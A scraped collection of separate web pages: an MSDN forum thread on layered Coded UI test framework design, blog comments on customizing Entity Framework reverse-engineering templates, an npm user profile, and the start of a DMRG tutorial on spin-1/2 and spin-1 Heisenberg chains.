In most cases it would be better if the assertion recorder and generator could generate expected values in a UIMap that subclasses (via inheritance) one of the library UIMaps. Another useful way to do things would be to allow the assertion generator to add expected values to some file, such as a CSV or Excel spreadsheet. The UIMap subclass situation would be ideal, since a test could call its recorded assertion methods that are local to the test, and these methods would be able to use the pre-existing UIMap to verify expected values. As far as I know, using the Coded UI Test Builder in this way is not possible at this time, and as such, assertion methods need to be provided via the library of test functionality. Somehow the test-specific expected values need to be accounted for, but they cannot be recorded without duplicating UIMaps, undermining the usefulness of the recording tool. I must make a design decision and balance the tradeoffs of maintainability and ease of use in whatever system I implement. Making a component-wise library of functionality will provide maintainability and scalability, but will require much more development time initially and could potentially be more difficult to use for non-developers. That said, I believe maintainability and robustness of the system is the highest priority for our automated testing system due to personnel constraints. I do not want to get bogged down maintaining old tests; I would rather build new tests and have to perform simple fixes to components used in older tests. I have defined three levels of testing functionality, each of which is a "test project" inside a "testing solution". Each test project is compiled to a .dll and is referenced in the next higher level of functionality. These levels are as follows:

1. The top level (level 1) is the common functionality that will be used in testing all of our software products.
Examples of this are things like bitmap checkpointing, which any individual test might need to use.

2. The middle level (level 2) is the application-dependent test functionality (test component) provider. This level is where all UIMaps exist and where the definitions of recorded or hand-built atomic components and composite components exist.

3. The bottom level (level 3) contains the actual tests that will be executed. These tests will call test components from level 2 to perform some common actions, such as "opening a project", and will also allow the use of recording for per-test steps. These per-test recordings will allow the components from level 2 to be glued together to accomplish tasks for which no test component has been defined in level 2. If it is found that all or part of these per-test recordings are being duplicated across different tests, then the common pattern can be extracted and will be a strong candidate for promotion to level 2.

I would like to know what anyone thinks about my design, and if anyone else has tried something similar. I am concerned about this design cutting out much of the recording of actual tests, but at this point I feel that once a large number of tests are created, this framework will make the tests more maintainable. Please give me your feedback and any ideas you have. Any input is welcome! I am trying to learn how to maximize the effectiveness of my testing project, and how to leverage VS2010 properly. Best regards, Elliot

All Replies - Monday, May 17, 2010 2:38 PM (Moderator) Elliot, That's a very well designed test framework. A couple of questions:

1. If there is any change in the UI components of your application, you will change only your middle level (level 2), right?
2. For any change in the functionality of your application, from what I understood, you will change the bottom level (level 3), right?
3. Can you share with us what difficulties you saw/see if you take the "recording the tests" approach?
I understand, it gives you great control if you hand-code your scenarios/logic as you have in your framework. In fact, that is one of the reasons we have such a rich UIMap. Thanks, Vishnu. Please mark this post as answer if this answers your question. - Monday, May 17, 2010 10:26 PM Hello Vishnu, Thanks for the quick response. The support I have found on this site is great! Answers to questions: 1) Level 2 (the library of test components) exists to try to minimize the changes required to level 3 if a UI change happens in the application under test. Ultimately it would be ideal if all tests in level 3 were totally decoupled from the UI in the AUT via level 2 test components that provide the functionality of Coded UI Test via indirection. In that situation, none of the tests would require any change if the AUT UI changes. This is an ideal situation and it is unlikely to be fully realized, especially while level 2 is not fully mature. Test components in level 2 will provide functionality for the most common patterns in the workflows in the AUT, but some tests will require per-test functionality that is not used outside the test under consideration. As such, if there is an AUT UI change, it may break per-test functionality, but this is an expected scenario. The benefit of having level 2 provide common patterned functionality is that in general these patterns will be used for the common logical groups of operations that are used in most tests, or at least in more than one test. As such, if UI changes happen in the domain of the level 2 test components, only level 2 components need to be changed, and it is likely that the changes will be localized by design. So the answer is that if UI changes happen, level 2 will need to be altered, and it is possible that level 3 will also need to be altered. However, level 2 will hopefully provide enough indirection between level 3 and the Coded UI Testing of VS2010 that level 3 tests will be insulated from changes to the AUT UI.
Hence changes to level 3 (which contains the tests and hence is the largest maintainability liability) will be minimized. 2) Application functionality changes could possibly only require level 3 changes, although I am not sure that functionality changes will happen without some UI changes. If the UI changes or changes happen to a very common workflow such as opening a project, then level 2 will also have to change to reflect this. This is the point of level 2 though since if a common pattern such as opening a project was to change, it would likely be used in many tests and as such we only want to maintain the test component that implements it in one place, rather than changing the multitude of tests. But yes, I think I know what you meant about this, and that application functionality tests are actually happening at level 3. So for example if more tests are added, they can be added right into level 3 using functionality from level 2 to provide pre-built test components for doing common things. If a test is changed in form, it should only have to change in that test in level 3. 3) This is more complicated to answer but I will try to describe it fully. I did some more thinking and there is really no problem with recording to create test components, it’s just that you never record in a test, only in the library of test components. If we try to record actions in a test directly, the Coded UI Builder will create a new UIMap in the test project (level 3). Thus we must either want to create per-test functionality that will not be used in other tests and this will be recorded against a local UIMap, or we must want to record some reusable component in the library of test components (level 2). So recording is no problem, except that the aim is to have to record in an actual “test” as little as possible and code the test up as a series of method calls. 
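Coding a test up as a series of method calls might look like this sketch (the component class, map, and UIMap method names are all illustrative, not from the actual framework):

```csharp
// A hedged sketch of a level-3 test assembled from level-2 components.
// "Components", "sharedMap", and the UIMap method names are assumed names.
[TestMethod]
public void CreateReport_FromOpenedProject()
{
    // Level-2 composite components perform the common logical groups...
    Components.Login(sharedMap, "testUser", "testPassword");
    Components.OpenProject(sharedMap, "DemoProject");

    // ...while per-test recorded steps and assertions fill the gaps.
    this.UIMap.ClickCreateReportButton();
    this.UIMap.AssertReportWindowVisible();
}
```

Only the last two calls would come from a per-test recording; everything else is a call into the shared library.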
It might be nice if one could point the Coded UI Test builder at the library of test components and do some auto generation along side per-test recording, but this is not required for my system to work. Recording assertions is where I see the most problems due to duplicating UIMaps over many tests and also the library UIMaps. The following scenario will happen; each test has its own set of expected values and these can not be stored in the library of test components. As such to use the Coded UI Test Builder to record an assertion and have it create the expected values per-test, one must record locally to a test, which will create a new UIMap that duplicates some of the already existing library (level 2) UIMap. This will directly undermine the whole purpose for introducing level 2 since if anything in the UI of the program changes, it is likely that this change will still break a test in two ways. First the library will be broken and need updating. We expected to have to do this work since the purpose of the library is to absorb the brunt of the work of making changes to the tests and enable us to apply the change in only one place. The second way that a test will be broken is that the assertions rely on a UIMap that contains duplicate information that is now broken. So all the assertions would need to be re-recorded for each test in my model. This is not really an option and a solution must be found or I might as well just record each test and try to maintain them all rather than building the framework. I have come up with two possible solutions. The first solution is simply building assertion methods into the library of level 2 and not ever use the Coded UI Test Builder for recording any assertions. For example some textbox needs to be checked for a value but this textbox is commonly used in the library (level 2) so we provide a method called assertTextboxX in level 2 that takes the expected value that is stored on a per-test basis. 
This assertTextboxX method then returns or throws an exception compatible with the Coded UI Test exception handling. In this way the library needs to supply an assert method for each element that might need to be asserted. The second solution will allow the use of the Coded UI Test Builder, but it will need to be modified to work. The Coded UI Test Builder would need to be aware of any UIMaps that are used from the library (level 2). When someone goes to record an assertion, we know that it is likely that at least some UI elements exist in a UIMap in the library and so the test builder could be made aware that a UIMap may subclass some other UIMap. We could subclass a UIMap and inherit all the information about the UI elements and any built in assertions that are common to the library. Then the Coded UI Test Builder could add the appropriate code to the “test local” UIMap that is derived from the library UIMap class. This will expose all the functionality for interacting with the UI Elements without introducing duplication of the UIMaps from the library and allowing the Coded UI Test Builder to add the appropriate assertion expected values to the subclassed UIMap without fear of breaking anything in the library. I hope that is an acceptable answer. Thank you again for your time. Best regards, Elliot - Tuesday, May 18, 2010 2:54 PM Hi Elliot, Your design is indeed a great one. I have implemented something similar but using different tools. We are not on Visual Studio 2010 yet but use the Microsoft UI Automation Interfaces for automating our application. The approach we took is very similar to yours, there was a need to allow non-developer testers to write robust and maintainable UI Tests so we wrote a framework that leverages Windows Workflow. We home grew our solution due to Microsoft not having a UI Test tool at the time but have found that it works very well. 
Level 1 in our system is an underlying framework that provides common items like logging, generic control manipulation and other generic items such as starting/stopping the AUT, etc. This is a non-application-specific level and is the underlying framework for level 2. Level 2 is the Windows Workflow Activities that are built on top of the framework. Each component (such as LogIn or CreateNewOrder) is developed as a Windows Workflow Activity, and because Windows Workflow allows for composite activities, we only have to drag and drop to build complex composite activities for use in the designer. There are just a couple of us that maintain these activities. Level 3 is the Windows Workflow Designer. The Workflow Designer provides a very easy drag-and-drop interface for testers to create tests. Each test case (or Workflow) is serialized out to XML and checked into source control. As for the UI map, we use an XML file to specify the identification properties required to ID controls on screen. Custom code was written to find controls on screen for use in the automation client. The XML file also uses a Single File Generator in Visual Studio to generate and properly subclass control types (for example, if we specify that a control is of type Button in the XML UI map, then a class is generated that derives from the Button class in our automation framework, thus exposing all typical button functions to that control). Maintainability works pretty well in this model, as it seems it would in yours. I never put much stock in being able to record/playback scripts; it always looks cool, but it never seems to work out in practice (maybe Microsoft's new tool addresses this, though). Mike Watkins - Tuesday, May 18, 2010 5:30 PM Hello Mike, Thanks for the information. I am only vaguely familiar with Windows Workflows, but what you mentioned sounds very interesting. I will make an effort to check Workflows out.
Best regards, Elliot - Thursday, June 24, 2010 2:42 PM Mike, I'm glad to run across someone else trying to take this approach. Can you recommend a good way to come up to speed on Windows Workflow? Paul Ebert - Thursday, June 24, 2010 3:14 PM All, Very interesting topic - I myself am in the middle of the same scenario and am implementing a similarly tiered framework:

Level 1 - common functionality: reporting, low-level object interactions, etc.
Level 2 - AUT actions: login, etc.
Level 3 - test cases: a combination of Level 2 actions.

I'm currently looking at how best to implement my object library. I want to keep it pretty lightweight, but want to maintain the object descriptions along with more semantic information [localisation IDs and the like], so I intend to wrap the descriptions in a generic object class. I'd be interested in your approaches to describing and locating objects - I've found with most other tools I've used that it's useful to describe them hierarchically, since very similar objects may only be differentiated based on a parent object. From what I've generally seen with VS, objects get described uniquely, and there hasn't really been any mention of finding objects from a parent object. cheers, Graham - Thursday, June 24, 2010 4:06 PM Hello Elliot, I have implemented a similar model for my application. I prefer hand-coding rather than recording, as record/play tends to create maintainability problems later. In answer to the third question, you mentioned building assertion methods into the level 2 library. I would like to add that this approach is working fine for me as well. Everything looks good up to here. But the problem comes when I have to create data-driven tests. Like your "open a project", my application requires user credentials, and based on those credentials the home page varies from person to person depending on which functionality the user has permission to use.
I created test methods at level 3 where I call the methods from level 2. Now, each of my test methods starts with Login and ends with Logout, with some functions in between. The problem occurs because I need multiple data-driven functions in a single test method: for login as well as for the functions between login and logout. I include a CSV for my login data in the test method, but use an embedded resource file for the inner functions' data. Will this create a problem in the future? Any inputs will be appreciated. Thanks - Monday, June 28, 2010 6:33 AM Hi All, I'm glad to hear that I'm not the only one writing Coded UI tests by hand and foregoing the recording interface - Monday, June 28, 2010 11:23 AM Sure - I purchased Bruce Bukovics' book, Pro WF (ISBN: 978-1-4302-0975-1). This was my main source of information when I was learning it. Mike Watkins - Monday, June 28, 2010 11:30 AM Hi Graham, I found that using XML to describe my objects hierarchically works pretty well. I developed a Single File Generator that takes the XML and generates the objects into classes that I can use (e.g. a Button control gets a class that derives from Button). You can then use the TreeWalker to get the controls from the screen (using the identification attributes described in the XML). Mike Watkins - Wednesday, June 30, 2010 12:38 AM Great topic, and I'm glad to see some other folks thinking along these lines. I am coming from a QuickTest Pro world as a pretty experienced developer. I am looking at Coded UI to see how I can shoehorn my framework into the structure of how VS2010 is put together, which admittedly I'm pretty ignorant of right now. My QTP implementation is similar to those detailed above, with some differences. First, taking the advice of several veteran QTP folks, I bypassed the Object Repository altogether in lieu of a database solution.
For those not familiar with QTP, it uses an internal object repository that stores objects and their properties and makes them accessible/editable, etc. via a decent GUI that you can use to explore, add, and modify objects. For reasons I won't go into here, it can become problematic to deal with this repository in large-scale implementations. I instead chose to implement a SQL Server based object repository, with tables set up to store objects and their properties; via utility functions that I created, I am able to programmatically create an object at run time with the appropriate properties based on the action to be taken. So to 'diagram' my framework:

Level 1 - Object database. Contains definitions for all application-specific and product-suite common controls that are utilized by the test cases. A typical object would have a 'friendly' name (this is how the control is accessed in the code), an AUT property (application-specific or common), and the actual object properties: object type (WebEdit, WebButton, etc.) and object properties (html id, html tag, innertext, outertext, etc.). Each time a new major revision is built, the prior revision's object database is promoted as the starting point for the new product revision.

Level 2 - Common function library. Contains wrapper functions for clicking, getting, setting, etc. controls. These wrapper functions retrieve the object properties from the object database, validate their presence in the application, perform the desired action, and write a log file entry for the status of the operation.

Level 3 - AUT actions: login, add an address, etc.

Level 4 - Test cases. Combines AUT actions into a series of calls that make up an application workflow.
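Translated to the Coded UI world the thread is about, a level-2 wrapper over such a database-backed repository might be sketched like this (the ObjectRepository.Lookup helper and the table/column names are hypothetical, not from any real framework):

```csharp
// Sketch: resolve a 'friendly' name to identification properties stored in a
// SQL table, then build the control's search properties at run time.
// ObjectRepository.Lookup and the column names are assumed.
public static HtmlControl FromRepository(UITestControl parent, string friendlyName)
{
    DataRow row = ObjectRepository.Lookup(friendlyName); // e.g. a SELECT on an Objects table
    HtmlControl control = new HtmlControl(parent);
    control.SearchProperties.Add(HtmlControl.PropertyNames.Id, row["HtmlId"].ToString());
    control.SearchProperties.Add(HtmlControl.PropertyNames.TagName, row["HtmlTag"].ToString());
    return control;
}
```

As in the QTP version, a UI change then means updating one database row rather than touching the code that uses the friendly name.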
The vast majority of my updates happen at level one, since I am dealing with a mature product where the UI doesn't change a lot; and since I use the friendly name to access the object in the code, if an object changes I only need to update the changed properties and never the code accessing the object. The entire suite is data-driven, comprising tables that represent the individual screens in the application. This data is queried as the script runs and drives the scripts to navigate to specific screens, populate/interact with specific controls in the application, etc. Overall the design has proven to be robust and easily maintainable. The SQL-based object repository lowers overhead as well, since I can deploy my scripts to any machine with QTP, and as long as it can see the SQL server on the network it can run the test suites. There is no need to pass around a suite-specific UI map. I would like to implement a similar design in VS2010 and am not sure how it can be done just yet. If anyone has any insight into how I might accomplish something of this degree, I would appreciate any tips. I'll pledge to post my findings back to this thread as I move forward. -John - Wednesday, June 30, 2010 12:20 PM John, I am in the same situation as you. With QTP I never used recording; instead, I used the expert view to write code directly against the OR. I've had my hands on VS for probably a month now and I am feeling ignorant. To date, I have learned that VS does not have anything close to the OR; it appears to me that recording is a must, and each recorded script will own its UI map. For those who are experienced with VS, please correct me if I am wrong. I am learning. - Wednesday, June 30, 2010 3:21 PM If you don't want to use the UIMap or the code builder from VS, you will still be able to create automated tests (like you did in QTP; I assume you used DP for some objects).
For example, to set the text of an edit box you can use:

BrowserWindow browser = BrowserWindow.Launch(new System.Uri(address));
HtmlEdit edit = new HtmlEdit(browser);
edit.SearchProperties.Add("Id", "editBoxID");
edit.Text = "test";

Or you can create your own map. You can use the code builder to add the map and all the objects to the map, and after that you can manually edit the map by adding/changing the object properties, adding new objects, and so on. After that, all you need to do is generate the .cs class and you will be able to access the objects in almost the same way as in QTP. - Wednesday, June 30, 2010 11:28 PM @Silviu - Thanks for the information. I'll create a small project and try to implement your suggestions above. To answer your question regarding DP, my entire framework is implemented using DP; not one control exists in the QTP Object Repository. I take an undocumented approach, however, in that I use inline DP via the Eval statement; this reduces code and makes maintenance easier. I'll probably be back to pick your brain as I move forward with this endeavor. @NewToVS - Like you, I do not use the recorder; everything is coded by hand. I treat it as a software development project. I am going to try out Silviu's suggestions to see how closely I can get a Coded UI framework to resemble the design of the framework that I've implemented in QTP. I'll post my progress here. -John - Thursday, July 08, 2010 12:32 PM Hello All, I want to discuss and get feedback about the ideas I have tried for creating a custom testing framework for our application using VSTS 2010. Firstly, to modularise, I have tried to develop the framework with scripts based on page-wise actions in our application. Considering the Person creation module in our application first: the user needs to log in, and a successful login lands on the Person Lookup page.
In this page, we have the NEW button that takes the user to Person Maintenance Page which is where a person can be created.The Person Lookup would have other operations like SERACH A RECORD or RESET the data entered in textboxes. In order to implement Person creation I have kept 3 testmethods in CODED UITest .cs file as follows: 1.Login testmethod -to perform the actions for LOGIN PAGE 2.PersonLookup testmethod- to click NEW button for Person creation 3.Person Maintenance testmethod- to create Person record with actions like SAVE and Refresh I also have a Class file where I have defined methods to construct UI Controls(HTML textbox, combo box, Button etc.) required for every action to be performed like entering Username and Password and Login button.These UI Controls would be built dynamically with data driven from a CSV file. This CSV file has inputs like the control's ID and Name and also the actual value to be entered after constructing the control.The same Class file also has the Helper methods defined based on the Functionality to be perfomed( like Login, Click NEW, Create Person) The code flow would be like: [testmethod] This test method has input data(Control Id and Name) for constructing different UI Controls for Login Page from a CSV file: public void Login() { string url = testContextInstance.DataRow[0].ToString(); string browsername = testContextInstance.DataRow[1].ToString(); .................... 
// different inputs required for this method
TestRunner tr_construct_BW = new TestRunner();
tr_construct_BW.Login_app(url, browsername, classname, windowtitle, userid_id, userid_name, Username, pwd_id, pwd_name, pwd, LoginBtn_id, LoginBtn_Name, btn_type);
}
Login_app()
{
Launch_Browser(url, browsername, classname, windowtitle);
construct_HTML_Document(bw, windowtitle);
construct_HTML_Textbox(document, userid_id, userid_name, Username, windowtitle);
construct_HTML_Textbox(document, pwd_id, pwd_name, pwd, windowtitle);
construct_UITestcontrol_Btn_Submit(document, LoginBtn_id, LoginBtn_Name, btn_type, windowtitle);
}
A sample method to build the textbox control, in the same class file as the helper methods:
construct_HTML_Textbox(HtmlDocument document, string Id, string Name, string Value, string windowtitle)
{
HtmlEdit textbox = new HtmlEdit(document);
textbox.SearchProperties.Add("Id", Id);
textbox.SearchProperties.Add("Name", Name);
textbox.WindowTitles.Add(windowtitle);
textbox.Text = Value;
}
In this same way I have defined the other 2 test methods for Person creation. The issue I face here is that during multiple Person creation (which means the [Person Maintenance] test method needs to be iterated until there are no more rows in the CSV file), after I log in, click NEW in the Person Lookup screen and move to the Person Maintenance screen to create a Person, I need control over the NEW button again to create another Person, for which I would need to call the [Person Lookup] test method. But I'm unable to do this, maybe due to constraints on using test methods: calling a test method from within another might not be possible. Does anybody know an alternative way to continue with this style of implementation? How would I get control over the NEW button again to continue with multiple Person creation? I would also like to hear feedback on this kind of design, and if anyone else has tried something similar, please share that too.
PRIYADARSHNI - Wednesday, September 15, 2010 3:05 PM Hi, We have also implemented a similar framework, but we have had to implement local UIMaps for individual solutions/projects. The idea of having a common/shared object library seems great: in case there is any change in the object properties we have to change it in only one place, thereby reducing maintenance effort. We have teams working at different locations on the same product with different configurations, and we have no common/shared repository where everyone has access. This makes it difficult to share the UIMap across teams. Instead, we have a common namespace with a partial class wherein we can keep the common code with a common object repository. (Something similar to tier 2 in the first post of the thread.) The architecture of the framework is something like this: Tier 1: The master script or the ordered test that calls the scenarios (Tier 2 with test methods). Tier 2: The scenario script with calls to the test methods present in the partial UIMap class. Tier 3: The UIMap with the methods/actions along with the local object repository/UIMap. Apart from these we have the common namespace (Support solution, as we call it) with partial classes that have code for all the common functionality, generic as well as application/product specific. We have a number of automation scripts/solutions/projects that each have their individual components for all three tiers, but with only one common Support solution. I request everyone to please give their feedback on the architecture and discuss what improvements are required for low maintenance effort. Would a shared object repository/library be a good idea without a proper source control tool, or not? Please let me know if I need to elaborate on the architecture. All inputs will be highly appreciated.
Regards, Pankaj - Edited by pankaj.nith (Microsoft Community Contributor), Wednesday, September 15, 2010 3:06 PM (typo) - Wednesday, September 29, 2010 11:05 PM Can someone post the code with the example? We also have a similar problem with automating the same application for multiple countries. - Monday, October 04, 2010 9:03 PM Hello Meetsachinhere, Sorry for the delay in my reply; I had not been getting emails about posts to this thread. Anyway, the way I do this sort of thing is to store the data in an Excel or CSV file like you mentioned. Often I iterate the test for every row in the spreadsheet and pass the appropriate data around. I think I understand what you are asking, but I am not 100% sure. Each iteration has its input parameters and expected results; I don't immediately see a problem with your method, although at this time I prefer to keep the data stored in data files that are not managed by source control. It sounds like you will have a lot of conditional branching in your tests. In my opinion, the more branching a test takes into account, the more likely it is a candidate for refactoring and being broken up into smaller, more targeted tests. If I have not answered your question, please write back. Best regards, Elliot - Wednesday, July 27, 2011 9:18 AM Can anyone send me the folder structure for Coded UI automation? Suresh D - Thursday, February 16, 2012 10:52 AM Hi, We have a Windows application to automate; please provide us the folder structure for Coded UI automation. sowmya - Thursday, March 08, 2012 10:54 PM We are creating a similar custom framework around VS 2010 Coded UI. However, we have run into an architectural discussion on where we should throw our asserts (pass/fail). Currently they are thrown from the UIMap, but we were wondering if we could instead pass the UIMap "control" or test result to the calling method and throw the assertion at that point. Is there a specific reason why the UIMaps hold the asserts?
Thanks Sophia Johnson QA Director MediMedia - Tuesday, May 01, 2012 2:41 AM Hi All, The original post here is almost 2 years old; I am curious to know how people have progressed with the development of a workable framework solution. Like a couple of posters here, I have come from a QTP background. I was part of a team that created an automation framework for QTP; this is now a commercial product marketed by a previous employer. This framework solution gave the users a GUI to build automation in a plain-English wizard. The one thing we did use was the QTP Object Repository tool; it was used to create a map of the AUT for the GUI wizard to use. There was scope for some DP objects. The process of building a test was straightforward: in the GUI the tester would select an object, and against that object there were pre-defined methods. The method was selected and an action or data input was set. All the steps required were built and saved to a database. Coded components could also be called along with the keyword steps created in the wizard. The GUI was also used to assemble the modular test components created, so if small reusable assets were created, these could be called as a group to form a larger test. At runtime the test is assembled from the database assets, and the actual QTP script is created at runtime in memory; the scripted QTP code never exists outside the runtime memory. The test at runtime is seen as a complete QTP test that can be run directly from the GUI, QTP or Quality Centre. The Object Repository is referenced and becomes associated at runtime as well. There has been some work on writing an engine for Coded UI automation to go with a version of a similar framework structure as mentioned above. This automation framework development process started around 3 years ago as an Excel-based prototype. So I am very curious to see what progress has been made with the framework discussed here.
http://social.msdn.microsoft.com/Forums/en-US/vsautotest/thread/944b33b3-f650-4dd8-a035-c807cbb2aadf/
24 Responses to “Customizing ‘Reverse Engineer Code First’ in the EF Power Tools” I’ve been contemplating using “Code First” in a new project I’m working on, but I enjoy developing the physical data model for the database the ‘old-fashioned’ way – so hearing about these reverse engineering tools helps to solidify my decision to use it. Thanks for the post. Calvin May 10, 2012 Rowan, any way you could start up a CodePlex or Github project for these templates, so we could more easily contribute improvements by forking the project? bmsullivan May 11, 2012 Are there any ways to control the table names that get generated from Code First reverse engineering? I would like to use this tool against an existing db, but there’s too much work involved in renaming tables after the tool generates code. Does the tool allow for some kind of mapping? Or, if not, how would I update the templates to use a custom mapping? Thanks Amon-Ra Mackie May 22, 2012 Hi Rowan, will there be an RC version of the power tools soon, or directly an RTM? cheers, johannes Anonymous July 10, 2012 I have been unable to get this to work. I first followed the tutorial, and when I ran “Entity Framework > Reverse Engineer Code First” it seemed to ignore the templates and resulted in the same mappings that it created without the templates. Thinking I must have done something wrong, I downloaded your templates, deleted all the files created from the previous attempt, cleared out the app.config file of any connection strings and ran it again … again it behaves as if it is ignoring the templates. Am I missing something? Gary July 24, 2012 Just tried this, Rowan, and it still generated fluent code and not Data Annotations. Seems like it didn’t read the changes I made? Any clues? Thanks, Peter August 7, 2012 Did you save the changes to the .TT files before re-running them? Louis February 3, 2014 I just want the reverse engineering to leave my table names alone, in all contexts.
I don’t use spaces or underscores, but table names like Status become Statu. I have played with plural vs. singular and get varying results. I want my output to be, for example, DbSet Status and DbSet Contact (not DbSet Contacts). This really can’t be that difficult. mbowles201 August 13, 2012 I get the: Compiling transformation: The type or namespace name ‘EfTextTemplateHost’ could not be found (are you missing a using directive or an assembly reference?) How do you get rid of it? I don’t want to be left with a compile error. Chris Nevill August 24, 2012 Rowan, how do I disable the pluralization in the T4 generation? These templates always use pluralization for the relationships. Giovane August 27, 2012 Do you have any solution to get rid of this? Nico August 15, 2013 Hi! I am starting a new app and would like to use the code-first-with-an-existing-database approach. But it turns out to be a very big database, from which I would just like to pick a small subset of tables. Is it possible to reverse engineer just a subset of tables from an existing database? Jaime Mtnz Lafargue (@jaimeml) September 6, 2012 I am trying to generate code for some Oracle tables. The first thing I see (via ODAC tools for VS) is: error 6003: Schema specified is not valid. Errors: (1,607501) : error 2019: Member Mapping specified is not valid. The type ‘Edm.Decimal[Nullable=False,DefaultValue=,Precision=38,Scale=0]’ of member ‘ITEM_DIVISION’ in type ‘dboModel.ITEM_DIVISIONS’ is not compatible with ‘OracleEFProvider.number[Nullable=False,DefaultValue=,Precision=3,Scale=0]’ of member ‘DIVISION_ID’ in type ‘dbo.DIVISION_SHIPPING_LOCATIONS’. Note the dbo: Oracle doesn’t have any schema called dbo (that's SQL Server stuff). Also, it fails to generate code when the column size is number(38). Is there any way to fix these issues? I was able to generate code where tables don’t have number(38).
I also hate the all-caps class names (by default, table definitions in Oracle are all caps). Is there a way to convert the following:
public class DEPT
{
    public DEPT()
    {
        this.EMPs = new List<EMP>();
    }
    public short DEPTNO { get; set; }
    public string DNAME { get; set; }
    public string LOC { get; set; }
    public virtual ICollection<EMP> EMPs { get; set; }
}
to
public class Dept
{
    public Dept()
    {
        this.Employees = new List<Employee>();
    }
    public short Deptno { get; set; }
    public string Dname { get; set; }
    public string Loc { get; set; }
    public virtual ICollection<Employee> Employees { get; set; }
}
shashi September 20, 2012 […] We can modify these templates so that they behave differently: remove the mappings, avoid pluralization in our entities, etc. Click the link for how. […] Ingeniería inversa con EF Power Tools para Code First | Las cosas de David November 27, 2012 Hi Rowan, I want to add another template to generate DTO classes. I copied and pasted the Entity template and changed the name from Entity.tt to EntityDto.tt, then ran the reverse engineer tool, but it is not generating the DTO classes. Could you please tell me whether I can include a new template in the Entity Framework Power Tools? Ravi Potturi December 20, 2012 I ended up slightly modifying the files from Saber Soleymani since they resulted in some odd indentation for me. I made a repo in case others want to do pull requests, but hopefully, if/when there’s a more official repo for customizing these templates, we can move them there. :) manningj December 30, 2012 Whoops, forgot to include the url for the repo :-/ manningj December 30, 2012 Wondering, how would one add another .tt template file, to generate another set of, say, business objects, using the same approach as the Entity template, and have it executed? Or where would I find the docs that explain this? ScottO February 4, 2013 […] by modifying the templates that are used to generate code.
You can find an example of this in the Customizing ‘Reverse Engineer Code First’ in the EF Power Tools […] Code First to an Existing Database | vuongquyen June 3, 2013 […] The code that gets generated by the reverse engineer process can be customized by modifying the templates that are used to generate code. You can find an example of this in the Customizing ‘Reverse Engineer Code First’ in the EF Power Tools post. […] Code First to an Existing Database | technic8x June 20, 2013 When I use a custom data type such as “public MultiSelectList lstQualifications { get; private set; }”, it causes the error “Value cannot be null. Parameter name: key”. How can I get rid of this problem? cseppd September 1, 2013 […] Luckily, it is possible to modify the templates by including them in the project. […] Improve navigation property names when reverse engineering a database | Ask Programming & Technology November 8, 2013 Is it possible to create multiple DbContexts for multiple databases? The last time I checked, you could not do this with Code First. jinksksee March 13, 2014 Any way to have the models generated into the project’s root directory? I want my project to be called Models, so I don’t want a Models folder inside that. Thanks! Dirk Watkins (@dirkwatkins) November 8, 2012
http://romiller.com/2012/05/09/customizing-reverse-engineer-code-first-in-the-ef-power-tools/
mvolkmann
1 Package by mvolkmann
- liner: This is a simple Node.js module that reads lines from files and streams. It supports both old- and new-style streams.
13 Packages starred by mvolkmann
- async: Higher-order functions and common patterns for asynchronous code
- eventemitter2: A Node.js event emitter implementation with namespaces, wildcards, TTL and browser support.
- express: Fast, unopinionated, minimalist web framework
- expresso: TDD framework, light-weight, fast, CI-friendly
- jake: JavaScript build tool, similar to Make or Rake
- jshint: Static analysis tool for JavaScript
- liner: This is a simple Node.js module that reads lines from files and streams. It supports both old- and new-style streams.
- mkdirp: Recursively mkdir, like `mkdir -p`
- optimist: Light-weight option parsing with an argv hash. No optstrings attached.
- request: Simplified HTTP request client.
- rimraf: A deep deletion module for node (like `rm -rf`)
- strata: A modular, streaming HTTP server
- underscore: JavaScript's functional programming helper library.
https://www.npmjs.com/profile/mvolkmann
ALPS 2 Tutorials:DMRG-01 DMRG (revision as of 16:39, 5 December 2011) Contents - 1 Models: Heisenberg Spin Chains - 2 Running The Code - 3 Ground State Energies - 3.1 Fixed Length Ground State Energies - 3.1.1 The one dimensional S=1/2 Heisenberg chain - 3.1.2 The one dimensional S=1 Heisenberg chain - 3.2 Ground State Energies Per Site (Bond) Models: Heisenberg Spin Chains For applications of DMRG, we consider two models, namely the spin-1/2 and the spin-1 antiferromagnetic Heisenberg chains of length L, given by the Hamiltonian (with J > 0; we set J = 1) H = J \sum_{i=1}^{L-1} \mathbf{S}_i \cdot \mathbf{S}_{i+1}. The reason why we are choosing these two models, which you may already know from other tutorials, is that despite their superficial similarity they exhibit completely different physical behaviour and pose very different challenges to the DMRG algorithm. Let us briefly review their physical properties. Spin-1/2 Chain The ground state of the spin-1/2 chain can be constructed exactly by the Bethe ansatz; we therefore know its ground state energy exactly. In the thermodynamic limit the energy per site is given by E_0/L = 1/4 - \ln 2 \approx -0.4431. Ground state energies as such are of limited interest if not compared to other energies, but this one can serve as a beautiful benchmark of the DMRG method. Of more interest is whether the ground state is separated from the excited states by an energy difference that survives in the thermodynamic limit, i.e. whether the gap is vanishing or not. For the spin-1/2 chain, the gap is 0. At the same time, one may ask what the correlation between spins on different sites looks like. One knows for the infinitely long spin-1/2 chain that asymptotically (i.e. for large distances |i-j|) \langle \mathbf{S}_i \cdot \mathbf{S}_j \rangle \sim (-1)^{|i-j|} / |i-j|. This means that the spin-1/2 chain is critical, i.e. the antiferromagnetic correlations between spins decay with their distance following a power law; in this case the exponent of the power law is obviously 1.
There is also an additional square root of a logarithm correction which can be beautifully verified by DMRG calculations on very long chains, but given the very slow increase of the logarithm with its argument, we can ignore it in a first go. Spin-1 Chain For decades, people thought that the spin-1 chain would behave similarly, of course with some quantitative differences due to the different spin length. It came as a big surprise in 1982 when Duncan Haldane pointed out that there should be a fundamental difference between isotropic antiferromagnetic Heisenberg chains depending on the length of the spin, namely between half-integer spins (S = 1/2, 3/2, ...) and integer spins (S = 1, 2, ...), with the difference being most pronounced for small spin lengths. Hence, the spin-1 chain became the focus of strong interest, and in fact DMRG had some of its most important early applications right for this system. Unlike the spin-1/2 chain, the spin-1 chain has no properties that can be calculated exactly by analytical means; we have to rely completely on numerics when it comes to quantitative statements. The ground state energy per site is given by E_0/L \approx -1.401484. Again, the question of the existence of a gap is more important, and here one of the big differences to the spin-1/2 chain becomes visible: in the thermodynamic limit, the gap in the spin-1 chain is finite and given by \Delta \approx 0.41050 (in units of J) to five-digit accuracy. The question of the behaviour of the spin-spin correlations leads to yet another big difference to the spin-1/2 case. The correlations read asymptotically (i.e. for large distances |i-j|) \langle \mathbf{S}_i \cdot \mathbf{S}_j \rangle \sim (-1)^{|i-j|} e^{-|i-j|/\xi} / \sqrt{|i-j|}. The dominant contribution is now the exponential decay, which happens on a length scale \xi, the correlation length, which in 